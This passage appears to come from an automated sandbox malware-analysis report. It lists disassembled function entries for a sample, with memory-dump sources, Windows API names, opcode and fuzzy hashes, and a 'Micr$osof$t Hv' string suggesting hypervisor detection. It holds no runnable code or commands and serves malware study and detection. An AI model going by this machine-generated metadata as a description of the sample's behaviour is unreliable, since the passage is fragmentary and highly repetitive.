                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: Micr$osof$t Hv
                                                  • API String ID: 4218353326-2053847325
                                                  • Opcode ID: 5cbf663b88d7cf5d280e5dcc444eff2b1328cfda9c4ce4483164accd0b3eb047
                                                  • Instruction ID: ed6f33da5f5a6abe9d2405143be22ccfdd73d9cdb484ce9cc09a8592197eb182
                                                  • Opcode Fuzzy Hash: 5cbf663b88d7cf5d280e5dcc444eff2b1328cfda9c4ce4483164accd0b3eb047
                                                  • Instruction Fuzzy Hash: 7071C071E147498FDB18CFA8C44139DBBF1AB69310F14462EE48AE7382DA34EA45C755
                                                  Function 00D02430 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 244COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 3333
                                                  • API String ID: 4168288129-2924271548
                                                  • Opcode ID: cb375fdd81ffcabca9b132c9853f459fe7c8bbf96f327747fdbaeb76b6f349f8
                                                  • Instruction ID: f642bbe458507853057abf7f0ad9ae4315a74b2a39f1ef83ea8da77b879f0c3e
                                                  • Opcode Fuzzy Hash: cb375fdd81ffcabca9b132c9853f459fe7c8bbf96f327747fdbaeb76b6f349f8
                                                  • Instruction Fuzzy Hash: 6C91B371E026158FCB04CF69C8946ADB7B2AF99310B18C669E849FB385D731ED51CBB0
                                                  Function 00D35C90 Relevance: 3.4, APIs: 2, Instructions: 362COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ce356e4148fdba34b50585f5746ba660efac97e9929e16f8589c1184569bdc9
                                                  • Instruction ID: 950d13c8914672c321dcb99249eea7e5aa57b368d64868698f8cfc40a539df0e
                                                  • Opcode Fuzzy Hash: 9ce356e4148fdba34b50585f5746ba660efac97e9929e16f8589c1184569bdc9
                                                  • Instruction Fuzzy Hash: 50D1E471B10A158FCB19CF29D49166EF7F2AF95310F18C62DE456EB244E731E941CBA0
                                                  Function 00D522E0 Relevance: 3.3, APIs: 2, Instructions: 309COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f42d23e4a5c924737faa29335a76d7a0b0d33ca0b7e28601883fd419f4abd380
                                                  • Instruction ID: 60afaa9c35ef34e5a8bdfed788780b2a3bf80095651d000aab081c53d01803ec
                                                  • Opcode Fuzzy Hash: f42d23e4a5c924737faa29335a76d7a0b0d33ca0b7e28601883fd419f4abd380
                                                  • Instruction Fuzzy Hash: 55B19231B146068BCF19CF29C49057DF7B2BF9A311B19C629DC46EB250E734EC898BA1
                                                  Function 00D285C0 Relevance: 3.3, APIs: 2, Instructions: 299COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53bfb054be8f8435d8e8e674d596d80aecf7363e2ee9969622becc38bb240c57
                                                  • Instruction ID: a45aa1845c790908cf5e15e1713eb4ba2e6df283798fb706a2aa85ed28023786
                                                  • Opcode Fuzzy Hash: 53bfb054be8f8435d8e8e674d596d80aecf7363e2ee9969622becc38bb240c57
                                                  • Instruction Fuzzy Hash: 8EB1B271A05625CFCB14CF69D88056DF3F2AFA8314B18C629D846EB340EB31EC81DBA1
                                                  Function 00D45A70 Relevance: 3.3, APIs: 2, Instructions: 293COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17f48262af265d72b037e42770d14a289512ea989a8fc6244b1dda51e98c4eaf
                                                  • Instruction ID: 4bcf578d247f7edc8cf550f0d3f19ded2eb449a19d867bfe196be83c0421e712
                                                  • Opcode Fuzzy Hash: 17f48262af265d72b037e42770d14a289512ea989a8fc6244b1dda51e98c4eaf
                                                  • Instruction Fuzzy Hash: 7CB17F71A10A198FCB15CF29D48166EB7F2EF99310B2DC619D846EB345E731EC81CBA1
                                                  Function 00D23360 Relevance: 3.3, APIs: 2, Instructions: 275COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID:
                                                  • API String ID: 4168288129-0
                                                  • Opcode ID: 542c00a5a8ace043ee525ea3ce0de29c152b399008eeae2978990b791e9bd257
                                                  • Instruction ID: 4427f5c951a9dc1a53876e4f8a3a509444830b1551595b6fe07c82219574d623
                                                  • Opcode Fuzzy Hash: 542c00a5a8ace043ee525ea3ce0de29c152b399008eeae2978990b791e9bd257
                                                  • Instruction Fuzzy Hash: 87A10831B006258FCB15CE29D48026EB7B2AFE9314B2DC769D806EB340D735EE42CB61
                                                  Function 00D236A0 Relevance: 3.3, APIs: 2, Instructions: 274COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID:
                                                  • API String ID: 4168288129-0
                                                  • Opcode ID: ae760bcbb4746c7b546186eb8d43c3e52419e49838aa7dd140750356cebe883c
                                                  • Instruction ID: a50fe21911d8861ec175bc722f7534f76c7cbe76d572f5bbea2ba430758b2456
                                                  • Opcode Fuzzy Hash: ae760bcbb4746c7b546186eb8d43c3e52419e49838aa7dd140750356cebe883c
                                                  • Instruction Fuzzy Hash: 99A1E571B006258FCB15CE29D88066EF3B2AFA5314729C729D846EB345E735EE81CB61
                                                  Function 00D22B30 Relevance: 3.3, APIs: 2, Instructions: 273COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID:
                                                  • API String ID: 4168288129-0
                                                  • Opcode ID: 4263c7989b9896e82e309219600907b9ea9ded0dc326c1c0ddb28094f5a50f84
                                                  • Instruction ID: fe18521340fd02ba66c80baca62738c9f80fc4709318fabab32f251a72c3a723
                                                  • Opcode Fuzzy Hash: 4263c7989b9896e82e309219600907b9ea9ded0dc326c1c0ddb28094f5a50f84
                                                  • Instruction Fuzzy Hash: F2A1D931B006258FCB15CE29D88067EB3B2AFA531472DC669E845EB354E731ED81DBA1
                                                  Function 00D5ED70 Relevance: 3.3, APIs: 2, Instructions: 270COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID:
                                                  • API String ID: 4168288129-0
                                                  • Opcode ID: 0d3b26b6e1e093e05c0f233cdeaa61937ee72f2fda8f35038f4d072a709166ea
                                                  • Instruction ID: 68793d42314b4cf7bd2514c04629d3bf0bd33de0fbd4eb735eb03a9c336e4327
                                                  • Opcode Fuzzy Hash: 0d3b26b6e1e093e05c0f233cdeaa61937ee72f2fda8f35038f4d072a709166ea
                                                  • Instruction Fuzzy Hash: 6DA1C232B106158BCF19DF29C88166DF3B2AF9931171D8729EC46EB241D731ED858BA1
                                                  Function 00D2A460 Relevance: 3.3, APIs: 2, Instructions: 266COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID:
                                                  • API String ID: 4168288129-0
                                                  • Opcode ID: 3a39b7928474dd9ac7191dec5ecc1d3d49385e222134f0db5e033938cef8a046
                                                  • Instruction ID: c9115ae6fe6bcd488814eb844e53d59d1d68391ad1b3f0e3213e6a959a11bfae
                                                  • Opcode Fuzzy Hash: 3a39b7928474dd9ac7191dec5ecc1d3d49385e222134f0db5e033938cef8a046
                                                  • Instruction Fuzzy Hash: 73A1C731B006258FCB15CE2DD48066EB3B2EFE531472DC659D816EB355E731EC818B62
                                                  Function 00D504C0 Relevance: 3.2, APIs: 2, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,00D52AF0,00D52B60,?,?,?,?,?,?,?,?,?,?,?,00D50497,?), ref: 00D50553
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AcquireExclusiveLock
                                                  • String ID:
                                                  • API String ID: 4021432409-0
                                                  • Opcode ID: 949e701c58332fd74274c183673a9ff8502a340ed3aaf68dafd31d2d5e65a10b
                                                  • Instruction ID: be4b6bf34e5682a3f3e9b17722937715b840930dc65c73cd13ee6846c3d4dc34
                                                  • Opcode Fuzzy Hash: 949e701c58332fd74274c183673a9ff8502a340ed3aaf68dafd31d2d5e65a10b
                                                  • Instruction Fuzzy Hash: 7B617171A00209AFCF04DF68D851AAEBBB1FF49311F144129E906AB351EB71E959CFB1
                                                  Function 00D455E0 Relevance: 3.2, APIs: 2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00D455DA,?,?), ref: 00D45635
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,00000000,?), ref: 00D45791
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID:
                                                  • API String ID: 1678258262-0
                                                  • Opcode ID: 03d5778ddb5f812d6508aaa9c7f90599bdfd54f442acfe04274f825c5fb44ab0
                                                  • Instruction ID: 068ee7f29d1f9a03899a7e3ebfdea93fdf5c3f19bffb2ea5b98e4f1b5d044627
                                                  • Opcode Fuzzy Hash: 03d5778ddb5f812d6508aaa9c7f90599bdfd54f442acfe04274f825c5fb44ab0
                                                  • Instruction Fuzzy Hash: DD51C572E00A19DBDB14CF54E841AADB7B5EF44314F5D8139E946AB306D731AD01CBB1
                                                  Function 00D5D520 Relevance: 2.1, APIs: 1, Instructions: 551COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID:
                                                  • API String ID: 4168288129-0
                                                  • Opcode ID: ea6c291355a4ccd2279153ff8b6e4383ed5038e9364983c6e59969d94b19bb3e
                                                  • Instruction ID: 4a4de038d12d84e1dbd56efba61c818e228aa9b09b24eef0256fb5cfd8d13448
                                                  • Opcode Fuzzy Hash: ea6c291355a4ccd2279153ff8b6e4383ed5038e9364983c6e59969d94b19bb3e
                                                  • Instruction Fuzzy Hash: 3112C4726043459FCB21DF24C891AAFBBEAEF95354F05491DFC8997241DB30A909CBB2
                                                  Function 00D039DC Relevance: 1.9, Strings: 1, Instructions: 613COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
